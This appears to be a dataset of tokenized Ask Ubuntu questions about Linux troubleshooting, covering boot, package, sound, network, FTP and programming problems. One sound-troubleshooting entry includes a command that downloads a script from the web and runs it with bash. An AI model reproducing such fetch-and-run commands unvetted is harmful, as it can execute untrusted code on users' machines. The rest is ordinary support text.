522232	ca n't boot computer	i apologize in advance for formatting and post-organization , i am using a not very smart phone . now to the post : i 've been trying to boot my computer for about a hour now and it wo n't boot . when i used it last ( yesterday ) i updated the software . so logically i assumed that was the problem , but i tried to revert back and it still wo n't work . diagnostic tools : 14.04 lts . my computer is a lenova w530 , i7 8gb ram , 500hd ( all manufacturer , not sure of drivers or anything ( i believe it is in post history under wifi problem ) but no customization ) . if i try to boot normally , it freezes on this screen thus i have been trying to hold down shift , this arriving at this screen i then been choosing advance set up and choosing0-35 ( recovery mode ) from this screen choosing this will let me log in but then it freezes again at this screen that is as far as i have gotten . if anyone has faced this problem or knows how to fix it i will be very grateful .
522233	ubuntu runs slow when executing generic mapping tools job files	i was using generic mapping tools ( gmt ) for scientific data plotting . when i run these job files it take long time and complete system memory , so that i ca n't even scroll the mouse . please help ... ... ... ... . how to run my job files fast .
522234	e : sub-process /usr/bin/dpkg returned an error code ( 2 ) ? 'kate-data ' error ?	username @ username : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be upgraded : cups cups-bsd cups-client cups-common cups-core-drivers cups-daemon cups-ppdc cups-server-common flashplugin-installer gir1.2-gudev-1.0 katepart libcups2 libcups2 : i386 libcupscgi1 libcupsimage2 libcupsmime1 libcupsppdc1 libgudev-1.0-0 libharfbuzz-icu0 libharfbuzz0b libnss3 libnss3-1d libnss3-nssdb libpam-systemd libphonon4 libsystemd-daemon0 libsystemd-journal0 libsystemd-login0 libudev1 libudev1 : i386 phonon phonon-backend-gstreamer phonon-backend-gstreamer-common phonon-backend-gstreamer1.0 python3-distupgrade systemd-services ubuntu-release-upgrader-core ubuntu-release-upgrader-gtk udev 39 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/4,709 kb of archives . after this operation , 7,168 b of additional disk space will be used . do you want to continue ? [ y/n ] y extracting templates from packages : 100 % preconfiguring packages ... dpkg : unrecoverable fatal error , aborting : reading files list for package 'kate-data ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 ) how do i fix this ? i badly need help . thanks !
522235	using libreoffice base as gui for mysql database ( os- ubuntu 14.04 )	i have been trying to deploy one of my projects that uses jsp for the front end , tomcat7 for the server and a mysql database . i tried integrating the mysql database with the libreoffice database because i had to copy a lot of data from existing excel sheets and then paste it into the database . i downloaded the connector from the mysql site and put it in the library of tomcat7 . i modified the class path to include this .jar file into it . now i run my server and start my project and i encounter a null pointer exception while obtaining the connection.i am posting my code here class.forname ( `` com.mysql.jdbc.driver '' ) .newinstance ( ) ; con=drivermanager.getconnection ( `` jdbc : mysql : //localhost:3306/database_name '' , '' root '' , password '' ) ; thanks in advance
522245	libc6 broken : wrong version	dpkg : dependency problems prevent configuration of libc6-dev : amd64 : libc6-dev : amd64 depends on libc6 ( = 2.19-0ubuntu6.3 ) ; however : version of libc6 : amd64 on system is 2.19-0ubuntu6.1 . how do i fix my libc6 ? i 've done sudo apt-get update , fix-missing , install -f. none is working .
522246	uninstall ubuntu linux/ install windows 7	i want to uninstall my ubuntu linux from the computer because it 's very hard to use and install windows 7 . what can i do in this case ? ( i have an original windows 7 on cd/dvd )
522250	can log in as root but not user	my system said there were updates available and i went ahead and updated . now when it boots up i can sign in as root but not my other id ( just user ) . it prompts me and when i try to sign in as user it accepts the password and then ... nothing , just the desktop . i am running 14.04 . i can see in ubuntu software center all the updates that were done to the system . but i have no idea how to roll them back ( there are a lot of them ) or which one would have made the mess ! do n't understand how one id works and not the other ? any ideas ? answer to rishiag : no , unfortunately it does n't give me a terminal window.since nothing happens after `` signing in '' with user.i hit the power button for ubuntu to start shutdown procedures.when i rebooted i got the message `` error : malformed file-press any key to continue '' i 'm 100 % sure that i have never held on the power button till it shutdown , all shutdowns were done by the system itself . i know there is a fsck command to check file integrity but i tried and it says that it should n't be run while the system is mounted so i didn't.not really sure how to do that.if fsck runs ok , where would i go from there ? thx ! â ned yesterday
522253	sizeof operator is confusing	size of operator gives us the size of the data type provided as a parameter , but the following statement is confusing me char ch='a ' ; printf ( `` % d % d '' , sizeof ( ch ) , sizeof ( 'a ' ) ) ; prints 1 4 why ? ? ?
522254	no log in screen in ubuntu 14.04	i am using ubuntu 14.04 64bit ( up to date ) . i have installed kubuntu-desktop and used for 1 day without any problem . on next day found that kde restart randomly and log out automatically . so i remove kubuntu-desktop and reinstall ubuntu-desktop using the following command sudo apt-get remove akonadi-facebook akregator amarok amarok-common amarok-utils apport-kde apturl-kde ark audiocd-kio bluedevil calligra-data calligra-libs colord-kde cryptsetup dolphin dragonplayer freespacenotifier gnupg-agent gnupg2 gpgsm gstreamer0.10-qapt gtk2-engines-oxygen gtk3-engines-oxygen gwenview ibus-qt4 kaccessible kaddressbook kamera kamoso kate kcalc kde-base-artwork kde-baseapps-bin kde-baseapps-data kde-config-gtk-style kde-config-tablet kde-config-telepathy-accounts kde-config-touchpad kde-style-oxygen kde-telepathy kde-telepathy-approver kde-telepathy-auth-handler kde-telepathy-contact-list kde-telepathy-data kde-telepathy-filetransfer-handler kde-telepathy-integration-module kde-telepathy-minimal kde-telepathy-send-file kde-telepathy-text-ui kde-wallpapers-default kde-window-manager kde-window-manager-common kde-workspace kde-workspace-bin kde-workspace-data kde-workspace-kgreet-plugins kde-zeroconf kdegames-card-data kdegames-data kdegraphics-strigi-analyzer kdemultimedia-kio-plugins kdenetwork-filesharing kdepasswd kdepim-kresources kdesudo kexi khelpcenter4 kinfocenter klipper kmag kmail kmenuedit kmix kmousetool knotes konsole kontact korganizer kpat kppp krdc krita krita-data ksnapshot ksysguard ksysguardd ksystemlog ktorrent ktorrent-data kubuntu-default-settings kubuntu-desktop kubuntu-docs kubuntu-firefox-installer kubuntu-netbook-default-settings kubuntu-notification-helper kubuntu-web-shortcuts kwalletmanager libassuan0 libaudiocdplugins4 libbluedevil1 libcalendarsupport4 libchm1 libcln6 libdebconf-kde0 libepub0 libeventviews4 libfftw3-3 libgpgme++2 libgps20 libgrantlee-core0 libgtlcore0.8 libgtlfragment0.8 libibus-qt1 libincidenceeditorsng4 libindicate-qt1 libkateinterfaces4 libkblog4 libkcompactdisc4 libkdcraw-data libkdecorations4abi1 libkdegames6 libkdepim4 libkdepimdbusinterfaces4 libkdgantt2 libkephal4abi1 libkexiv2-11 libkexiv2-data libkipi-data libkleo4 libkmanagesieve4 libkonq-common libkonq5-templates libkonq5abi1 libkontactinterface4 libkpgp4 libkrossui4 libksane-data libksane0 libksba8 libkscreensaver5 libksgrd4 libksieve4 libksikdepim-strigi-plugins kdesudo kexi khelpcenter4 kinfocenter klipper kmag kmail kmenuedit kmix kmousetool knotes konsole kontact korganizer kpat kppp krdc krita krita-data ksnapshotmportguard ksysguardd ksystemlog ktorrent ktorrent-data kubuntu-default-settings kubuntu-desktop kubuntu-docs kubuntu-firefox-installer kubuntu-netbook-default-settings kubuntu-notification-helper kubuntu-web-shortcuts kvkbd kwalletmanager libassuan0 libaudiocdplugins4 libbluedevil1 libcalendarsupport4 libchm1 libcln6 libdebconf-kde0 libepub0 libeventviews4 libfftw3-3 libgpgme++2 libgps20 libgrantlee-core0 libgtlcore0.8 libgtlfragment0.8 libibus-qt1 libincidenceeditorsng4 libindicate-qt1 libkateinterfaces4 libkblog4 libkcompactdisc4 libkdcraw-data libkdcraw21 libkdecorations4abi1 libkdegames6 libkdepim4 libkdepimdbusinterfaces4 libkdgantt2 libkephal4abi1 libkexiv2-11 libkexiv2-data libkipi-data libkipi9 libkleo4 libkmanagesieve4 libkonq-common libkonq5-templates libkonq5abi1 libkontactinterface4 libkpgp4 libkrossui4 libksane-data libksane0 libksba8 libkscreensaver5 libksgrd4 libksieve4 libksieveui4 libksignalplotter4 libktnef4 libktorrent-l10n libktorrent4 libktpchat0 libktpcommoninternalsprivate3 libkunitconversion4 libkwineffects1abi4 libkwinglutils1abi1 libkwinnvidiahack4 libkwork kdesudo kexi khelpcenter4 kinfocenter klipper kmag kmail kmenuedit kmix kmousetool knotes konsole kontact korganizer kpat kppp krdc krita krita-data ksnapshot ksysguard ksysguarddate1 temlog ktorrent ktorrent-data kubuntu-default-settings kubuntu-desktop kubuntu-docs kubuntu-firefox-installer kubuntu-netbook-default-settings kubuntu-notification-helper kubuntu-web-shortcuts kwalletmanager libassuan0 libaudiocdplugins4 libbluedevil1 libcalendarsupport4 libchm1 libcln6 libdebconf-kde0 libepub0 libeventviews4 libfftw3-3 libgpgme++2 libgps20 libgrantlee-core0 libgtlcore0.8 libgtlfragment0.8 libibus-qt1 libincidenceeditorsng4 libindicate-qt1 libkateinterfaces4 libkblog4 libkcompactdisc4 libkdcraw-data libkdecorations4abi1 libkdegames6 libkdepim4 libkdepimdbusinterfaces4 libkdgantt2 libkephal4abi1 libkexiv2-11 libkexiv2-data libkipi-data libkleo4 libkmanagesieve4 libkonq-common libkonq5-templates libkonq5abi1 libkontactinterface4 libkpgp4 libkrossui4 libksane-data libksane0 libksba8 libkscreensaver5 libksgrd4 libksieve4 libksieveui4 libksignalplotter4 libktnef4 libktorrent-l10n libktpchat0 libkunitconversion4 libkwineffects1abi4 libkworkspace4abi2 liblastfm1 libloudmouth1-0 libmailcommon4 libmailimporter4 libmessagecomposer4 libmessagecore4 libmessagelist4 libmessageviewer4 libmuonprivate1 libmygpo-qt1 libopenal-data libopenal1 libopenconnect2 libopenctl0.8 libopenjpeg2 libopenshiva0.8 libplasma-geolocation-interface4 libplasmagenericshell4 libpoppler-qt4-4 libprocesscore4abi1 libprocessui4a libqalculate5 libqalculate5-data libqca2-plugin-ossl libqgpgme1 libqimageblitz4 libqoauth1 libqtglib-2.0-0 libqtgstreamer-0.10-0 libqtgstreamerui-0.10-0 libqtscript4-core libqtscript4-gui libqtscript4-network libqtscript4-sql libqtscript4-uitools libqtscript4-xml libreoffice-kde libreoffice-style-oxygen libruby1.9.1 libspnav0 libsyndication4 libtag-extras1 libtelepathy-logger-qt4-1 libtelepathy-qt4-2 libtempla eparser4 libweather-ion6 libyaml-0-2 libzip2 lightdm-kde-greeter muon muon-installer muon-notifier muon-updater okular okular-extra-backends oxygen-cursor-theme partitionmanager pinentry-gtk2 pinentry-qt4 plasma-dataengines-addons plasma-dataengines-workspace plasma-desktop plasma-netbook plasma-scriptengine-python plasma-widget-facebook plasma-widget-folderview plasma-widget-kimpanel plasma-widget-menubar plasma-widget-message-indicator plasma-widget-networkmanagement plasma-widget-telepathy-presence plasma-widgets-addons plasma-widgets-workspace plymouth-theme-kubuntu-logo plymouth-theme-kubuntu-text print-manager python-pyudev python3-pykde4 python3-pyqt4 python3-sip qapt-deb-installer quassel quassel-data rdesktop rekonq ruby ruby1.9.1 skanlite software-properties-kde systemsettings tasks-icons ubuntu-release-upgrader-qt usb-creator-kde & & sudo apt-get install ubuntu-desktop now after restart ubuntu loop in log screen ( black screen and cursor ) . i can log in using recovery screen ( recovery menu > resume ) . i am providing kernel and xorg log . kernel log auth log xorg log
522256	neverwinter nights does not run in xubuntu 14.04	i 'm using xubuntu 14.04 . i have installed neverwinter nights following the guide here : http : //forum.bioware.com/topic/136631-linux-install-diamond-edition-original-edition-169-update-nwmovies/ the problem is i ca n't start it . i ran ./nwn start script and the game did n't start . at first , i think it 's because nwmovies , but i tried disable the movies and still ca n't run the game . anyone know how to fix ?
522257	ubuntu 13.10 upgrade to ubuntu 14.04	is it possible fro me to download the update on my mobile sd card and then transfer the update on to my desktop.. ? ? please tell step by step thanks in advance .. ! !
522258	android game development using blender 3d or ogre 3d	good morning , i am ubuntu lover and want to design 3d games for my android smart phone . though i have searched lot over google and found that two powerful game development software like blender3d and ogre3d ( under linux ) supports 3d game development ( somewhat near to unity 3d - > which is not free ) . my question is that - 1 ) does game developed under blender 3d or ogre 3d can be exported to android devices ? ? 2 ) if yes , how ? ? any plugin is there ? ? i not , when can i expect them to support android game development . 3 ) is there any other way around , any other open source 3d game development software under ubuntu for android . 4 ) i found libgdx framework which supports android / ios and other os , and i did not find whether it supports 3d game development ? ? please give me a clear look to go ahead.. help in this regard shall be highly appreciated , thanks in advance aman
522259	reg : cron job is not running	i have set my cron jobs in linux ubuntu . cron is not running and even already set my mail id to test whether cron is working or not.its not luck for me . how to fix this issue .
522260	elementaryos wo n't play videos !	i 'm new at eos even though i was searching for this distro for a while . i have recently installed luna in a lenovo g480 but the only issue i got was that youtube or any video program did n't work so i look it up on the web and nvidia info was in so i installed it and reboot my system . luna does n't run anymore , a black wall is with a lot of commands . for a while i 've been searching for.solutions ... the most recent list or commands displayed are : could not write bytes : broken pipe •stopping restore sound card ( s ) mixer state ( s ) •starting cpu interrupts balancing daemon •starting cpus printing spoolers/server •starting crash report submission daemon •stopping save kernel messages •starting the winbind daemon winbind •starting ntp server ntpd saned disabled ; edit /etc/default/saned starting preload : preload . any help will be welcome . do n't know what to.do .
522262	linux skype problem with login	i ca n't login to my skype with my password , but on windows or android phone i can login normally.i was trying fully reinstall skype but this do n't help me . is something bad with connection ? some proxy or i really do n't know .
522263	installing massif-visualizer on ubuntu 14.04	i 'd like to install massif-visualizer on ubuntu 14.04 . by default , there 's no such package on that release . which repository contains that package ? $ sudo apt-get install massif-visualizer reading package lists ... done building dependency tree reading state information ... done e : unable to locate package massif-visualizer
522266	laptop touchpad is not detected !	this is the weirdest thing i have ever seen on xubuntu ... like ever . background : i am running xubuntu 14.04 on an acer v5-123 netbook . if the specs matter , then the netbook has an amd e1-2k with 4gb of ram . obvious question # 1 : is the system updated ? ans : yes , the system is regularly updated and has all the latest stuff from the main server . the real issue : till a few updates ago , the touchpad was working absolutely fine . unfortunately , i do n't use this netbook for my day-to-day work and so i had not updated it for like a few weeks . i updated it today ( sep 10 , 2014 ) and multiple issues seem to have cropped up ! ! but , the issue that concerns us here is : the touchpad is not detected at all on the system ! ! i opened the mouse-n-touchpad section of the xfce4-settings-manager and there 's no touchpad there . so , i ran lsusb and there 's no touchpad there either ! ! obvious question # 2 : is the touchpad hardware working at all ? i pulled out the xubuntu hdd and re-inserted the windows 8.1 hdd that came with this notebook and everything works as expected : touchpad and everything else . obvious question # 3 : so why not just stick with windows 8.1 ? ans : i ca n't make heads or tails of windows 8.1 so i need xubuntu running on this system . now , the request : can you help me figure out why xubuntu is not detecting the touchpad hardware ? is this a bug in the kernel i have ? the kernel version on my system is : 3.13.0-35-generic # 62-ubuntu smp x86_64 gnu/linux . your help is much appreciated .
522267	how to make the argument as optional in bash function ?	in have this function with 9 arguments : sum ( ) { echo `` the sum is $ ( ( $ 1+ $ 2+ $ 3+ $ 4+ $ 5+ $ 6+ $ 7+ $ 8+ $ 9 ) ) '' } and i want to make the second arguments to the next ( 3..9 ) become a optional arguments . when i call the function with 2 arguments i get error : sum 3 8 bash : 3+8+++++++ : syntax error : operand expected ( error token is `` + '' ) note bold : first argument and second argument are force arguments and not optional for function . i only asked second arguments to the next is optional and when i call the function less than 2 args the function must return no result .
522268	virtualbox - internet not working -adpater 1 nat cable not connected	i am running ubuntu 12.04 in virtual box hosted on windows machine . internet is not working . i tried - making changes in /etc/network/interfaces . - and then sudo service network-manger restart the result of ifconfig is eth4 link encap : ethernet hwaddr 08:00:27 : c6 : a1 : fd up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:80 errors:0 dropped:0 overruns:0 frame:0 tx packets:80 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:6496 ( 6.4 kb ) tx bytes:6496 ( 6.4 kb ) internet has been running all the time . it got disappeared now . any idea ? edit it is showing cable is disconnected
522270	can i install ubuntu on a 7 '' tablet with an intel atom z2560 1.6 ghz processor ?	i have a dell venue 7 android tablet with : ⠀intel atom z2560 1.6 ghz processor ⠀2gb ddr2 sdram can i install ubuntu on this tablet ?
522271	ubuntu overwrites connection settings during reboot	when i add system-ca-certs or password to a connection in /etc/networkmanager/system-connections and reboot the computer these new settings are gone . what can i do to keep those settings after a reboot ?
522274	thunar does not show preview icons for media files	admins , please do n't mark this as a duplicate as it is not a duplicate of this : http : //ubuntuforums.org/showthread.php ? t=1561446 background : i am currently running regularly updated xubuntu 14.04 on multiple laptops at home . till about a few updates ago , the xubuntu file manager thunar would show previews for media files . e.g . if you had a jpg file in your home folder then thunar would show a preview of that file . similarly , if you had a pdf file somewhere in your folder tree , and you were in that folder then thunar would show you a preview of that file . but , over the last few updates thunar has lost this ability . i have reported a bug on launchpad ( https : //bugs.launchpad.net/ubuntu/+source/thunar/+bug/1367381 ) and would appreciate if someone else can confirm that the bug exists . i would also appreciate if you can add/enhance the bug report there . finally , if you already have a solution for this , i would much appreciate if you share it here for me , and possibly others affected by this bug , to try and verify . your help is much appreciated .
522277	no sound after ubuntu base update	my info : http : //www.alsa-project.org/db/ ? f=cbf6b64acdde8c2f2d3a24cae453b4f2817e8a1e today i updated ubuntu base via software updater and now my sound does not work out of built in laptop speakers or the headphone jack . software updater may have updated other things besides ubuntu base , but unfortunately i was n't paying much attention . this log is about the time when update occurred and the problem began , but it seems to be mostly vlc related stuff , so i do n't know . /var/log/apt/history.log start-date : 2014-09-09 12:42:13 commandline : aptdaemon role='role-commit-packages ' sender=':1.241' upgrade : vlc-plugin-notify : amd64 ( 2.2.0+ppa2.1 , 2.2.0+ppa2.2 ) , libvlccore8 : amd64 ( 2.2.0+ppa2.1 , 2.2.0+ppa2.2 ) , vlc-nox : amd64 ( 2.2.0+ppa2.1 , 2.2.0+ppa2.2 ) , vlc-plugin- samba : amd64 ( 2.2.0+ppa2.1 , 2.2.0+ppa2.2 ) , libnss3-1d : amd64 ( 3.15.4-1ubuntu7 , 3.15.4-1ubuntu7.1 ) , vlc-data : amd64 ( 2.2.0+ppa2.1 , 2.2.0+ppa2.2 ) , libnss3-nssdb : amd64 ( 3.15.4-1ubuntu7 , 3.15.4-1ubuntu7.1 ) , libnss3 : amd64 ( 3.15.4-1ubuntu7 , 3.15.4-1ubuntu7.1 ) , vlc : amd64 ( 2.2.0+ppa2.1 , 2.2.0+ppa2.2 ) , libvlc5 : amd64 ( 2.2.0+ppa2.1 , 2.2.0+ppa2.2 ) end-date : 2014-09-09 12:43:01 the sound settings ( unity-control-center sound ) does not show any devices . alsamixer , after f5 ( show all ) has 2 channels i can change pcm and digital , i swear there used to also be a master channel ( and maybe others ) before . tried : pulseaudio -k pulseaudio -- start sudo alsa force-reload sudo apt-get remove -- purge alsa-base pulseaudio sudo apt-get install alsa-base pulseaudio sudo alsa force-reload older kernel and newer rc kernel aplay /usr/share/sounds/alsa/front_center.wav says it played , but no sound heard i ran the alsa info script : wget http : //www.alsa-project.org/alsa-info.sh -o alsa-info.sh & & bash alsa-info.sh my info : http : //www.alsa-project.org/db/ ? f=cbf6b64acdde8c2f2d3a24cae453b4f2817e8a1e
522282	skype 4.3 screen sharing in group call	i am using ubuntu 14.04 and skype 4.3.37 . when i participate in skype group call and other user share the screen , i am not able to see the screen . if the call is not group call and between 1 to 1 , i have no issues . one of my colleague who is using ubuntu 14.04 and skype 4.3 also have the same problem . any help will save my days of time . thanks in advance
522283	installing ubuntu 12.04 64 bit as virtual machine boot issue	hi i want to install ubuntu 12.04 64 bit as virtual machine . i am using mac os and vmware fusion . i have successfully install ubuntu 12.04 . but once i shut down vm and again try to start that time it stuck to ubuntu loading screen . i am not able to login and start my virtual machine again . i am not able to figure it out what is the actual problem . any one already face same problem . need some help . thank you .
522286	filezilla : failed to retrieve directory listing	i am running ubuntu 12.04 as the host and installed ubuntu 14.04 in the virtualbox as guest os . i have installed and configured vsftpd on ubuntu 14.04 and forwarded the virtualbox port 's as follows : now i am using filezilla in my host os in order to access into the guest os . here is the filezilla login detail : host : 127.0.0.1 username : hasan password : -- -- - port : 8181 now i press the quickconnect button to access into the guest os . login was success but filezilla was unable to access into the guest os ! . here is the messages : status : connecting to 127.0.0.1:8181 ... status : connection established , waiting for welcome message ... response : 220 ( vsftpd 3.0.2 ) command : user hasan response : 331 please specify the password . command : pass ****** response : 230 login successful . command : opts utf8 on response : 200 always in utf8 mode . status : connected status : retrieving directory listing ... command : pwd response : 257 `` /home/hasan '' command : type i response : 200 switching to binary mode . command : pasv response : 227 entering passive mode ( 10,0,2,15,224,245 ) . command : list error : connection timed out error : failed to retrieve directory listing i was unable to fix this . any idea ?
522287	sound too low in ubuntu	i had bought some new components for my pc . the fact is when i try to play any sound it 's almost audible , the sound is very low , even at max level . this is not a hardware problem , because when i 'm on windows , sound works properly . my specs are : -msi gaming 5 motherboard . -intel core i5 4570 -8gb ram -nvidia geforce 465 gtx thanks in advance . p.s . : i think motherboard uses some kind of hardware to improve quality of sound . something like audio boost , which uses creative sound-blaster or something similar .
522288	unable to install firefox on ubuntu 14.04 with firebug	i have ubuntu with 14.04 , but the firefox version is 28.0 . i am not able to install firebug for that version . so decided to update firefox but did not get any success . tried sudo apt-get update also tried update manager please help .
522290	problems in installation of ubuntu 14.04.01 alonside windows 7	when i am installing ubuntu 14.04.01 desktop version on my pc , i choose option `` install ubuntu inside windows '' and click continue , and just after that my pc was restated and i ca n't install ubuntu ... . so help me ...
522291	segmentation fault ( core dump ) error in c program	i am executing following program : # define size 50 /* size of stack */ # include < ctype.h > char s [ size ] ; int top = -1 ; /* global declarations */ push ( char elem ) /* function for push operation */ { s [ ++top ] = elem ; } char pop ( ) /* function for pop operation */ { return ( s [ top -- ] ) ; } int pr ( char elem ) /* function for precedence */ { switch ( elem ) { case ' # ' : return 0 ; case ' ( ' : return 1 ; case '+ ' : case '- ' : return 2 ; case '* ' : case '/ ' : return 3 ; } } main ( ) /* main program */ { char infx [ 50 ] , pofx [ 50 ] , ch , elem ; int i = 0 , k = 0 ; printf ( `` \n\nread the infix expression ? `` ) ; scanf ( `` % s '' , infx ) ; push ( ' # ' ) ; while ( ( ch = infx [ i++ ] ) ! = '\0 ' ) { if ( ch == ' ( ' ) push ( ch ) ; else if ( isalnum ( ch ) ) pofx [ k++ ] = ch ; else if ( ch == ' ) ' ) { while ( s [ top ] ! = ' ( ' ) pofx [ k++ ] = pop ( ) ; elem = pop ( ) ; /* remove */ } else { /* operator */ while ( pr ( s [ top ] ) > = pr ( ch ) ) pofx [ k++ ] = pop ( ) ; push ( ch ) ; } } while ( s [ top ] ! = ' # ' ) /* pop from stack till empty */ pofx [ k++ ] = pop ( ) ; pofx [ k ] = '\0 ' ; /* make pofx as valid string */ printf ( `` \n\ngiven infix expn : % s postfix expn : % s\n '' , infx , pofx ) ; } but iam getting segmentation fault ( core dump ) error.. any one solve this
522293	headless dlna renderer	i just received a raspberry pi , and i 'd like to stream music from my android device to it . i think the best approach is to use dlna , however i 'm having trouble finding a suitable headless dlna renderer/player/client . it is preferable that it runs in/from a terminal .
522294	display the ppid in the system monitor ?	is it possible to display the ppid ( parent process id ) in the process table of ksysguard ? there 's no option for it when i right-click on bar up top .
522295	ubuntu 14.04 bluetooth adapter no found	so , i 've a hp 4540 ( h6r10ea ) and my bluetooth is working fine under windows 8.1 , but when running ubuntu 14.04 ( i 've a dual boot ) i ca n't enable it . i tried searching on the forums , but none of the solutions worked for me . i typed in some commands in terminal and the output is down bellow , i hope it helps . rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 02:00.0 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 30 ) 02:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 30 ) 02:00.3 system peripheral : jmicron technology corp. ms host controller ( rev 30 ) 03:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 03:00.1 bluetooth : ralink corp. rt3290 bluetooth 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) sudo lsmod |grep blue bluetooth 391136 10 bnep , rfcomm
522301	how do i ensure font settings in unity tweak tool are used ?	the menu bar in ubuntu 14.04 lts trusty tahr is in an ( unknown ) bold serif even though the font has been set to deja vu sans . the search/location bar in firefox is in the correct font , and the window tabs in firefox are also in deja vu . but the firefox window title bar is also in the serif font . why are the tweak tool settings being ignored ?
522304	how to port forward my ip addr 192.168.2.24 with port num 80 to a webserver running on 127.0.0.1:10000 on the same comupter	my ifconfig result eth0 link encap : ethernet hwaddr 84:8f:69 : c2:35 : b3 inet addr:192.168.2.24 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :868f:69ff : fec2:35b3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5250 errors:0 dropped:0 overruns:0 frame:0 tx packets:3155 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3721050 ( 3.7 mb ) tx bytes:461466 ( 461.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:7366 errors:0 dropped:0 overruns:0 frame:0 tx packets:7366 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:698138 ( 698.1 kb ) tx bytes:698138 ( 698.1 kb ) wlan0 link encap : ethernet hwaddr 7c : e9 : d3:30:70:8b up broadcast multicast mtu:1500 metric:1 rx packets:71288 errors:0 dropped:0 overruns:0 frame:0 tx packets:48929 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:58094736 ( 58.0 mb ) tx bytes:7296590 ( 7.2 mb )
522305	how to install ubuntu	i 'm a macuser want to install ubuntu on an old-ish pc laptop that is not connected to the net . i have downloaded a file called `` ubuntu-14.04.1-desktop-i386.iso '' , copied it onto the crappy old laptop and some junky application called `` recordnow ! `` burns an exact copy of the .iso file to dvd , so nothing installs ...
522307	transmission . started with a `` permission denied '' , now it wo n't even run	so i just ventured into the land of ubuntu . it was a pleasant stroll until i came onto the chasm of users and permissions . i installed transmission-daemon . everything looked nice and easy , but once a download gets going , it gives a shiny red `` permission denied '' to my download path . so i started reading up on permissions . learned how to use `` gksudo nautilus '' amongst other things . but things did n't clear up at all . the download folder had no owner as far as i could see when i worked through the files dialog . with `` gksudo nautilus '' , it just crashed the window . i could n't even see who owned it . through the terminal it seemed all set like it should . both owner and group set to debian-transmission . then i stumbled on this topic : transmission daemon : permission denied even if debian-transmission has root group and i thought : `` hey , those are clear instructions i can follow ! let 's do this ! '' . now i 'm stuck with a transmission that wo n't even start . it gives me a nice `` transmission-daemon start/running , process 29525 '' . but that 's it . it stops right away and it 's gone . no error or anything that my untrained eyes can work with . can somebody help me with this ? some commands that can help me get further ? or should i just remove the whole thing and start over ? thanks in advance . //edit i have followed muru 's instructions and the daemon is back up and running but i am getting this error now : error : unable to save resume file : permission denied my download folders look like this : drwsrwxrwx 2 debian-transmission debian-transmission 4096 sep 8 22:35 completed drwsrwxrwx 2 debian-transmission debian-transmission 4096 sep 8 22:35 incomplete drwxrwxr-x 2 erik erik 4096 sep 8 22:35 torrents and the info folder is this : drwsrwxr-x 5 erik debian-transmission 4096 sep 10 13:43 info running transmission-daemon -- log-debug -- foreground gives me could n't read `` /home/erik/.config/transmission-daemon/stats.json '' : no such file or di rectory ( utils.c:201 ) even though it ca n't read the stats.json and i think it is somehow ignoring my settings file ( whitelist for ip 's isnt working ) . it does succesfully download to /home/erik/downloads . then i stop the service . and restart it with the command that i thought was correct sudo service transmission-daemon start and it starts making a mess again . so i do n't know , is the fact that it 's a service making a difference ?
522309	how can i set vsftpd user-specific access ?	i 'm using vsftpd ( on 14.04 ) and i want to set user-specific access : - admin has full access to home folder of all users - standard user ( everyone from group `` users '' ) has permission only for his home folder and there he has full access , he has n't any access to home folder of other users - admin home dir ( or at least its content ) is invisible for standard users how can i set these rules ? thanks for any advice
522310	what kind of access flash has to our systems ?	it seems like there is major security issue found in flash every other week or so . there was another one just yesterday . this and being closed source , i ca n't help but wonder , what kind of access it has exactly to a system . is it sandboxed to just the browser or can go out of it as well ? since it can be included in every site without even knowing , you might have an active instance of it at pretty much any time . so , what exactly it can do to our systems ? hypothetically .
522311	ubuntu 14.0.4 openvpn connection - username and password only	i 'm trying to set up a vpn ssl connection that uses just username and password . i 'm setting it up in openvpn with network manager . i enter the gateway , type=password , username and password . however the 'save ' button is greyed out until i enter a certificate . how can i set up a connection with only username and password ? thanks matthew
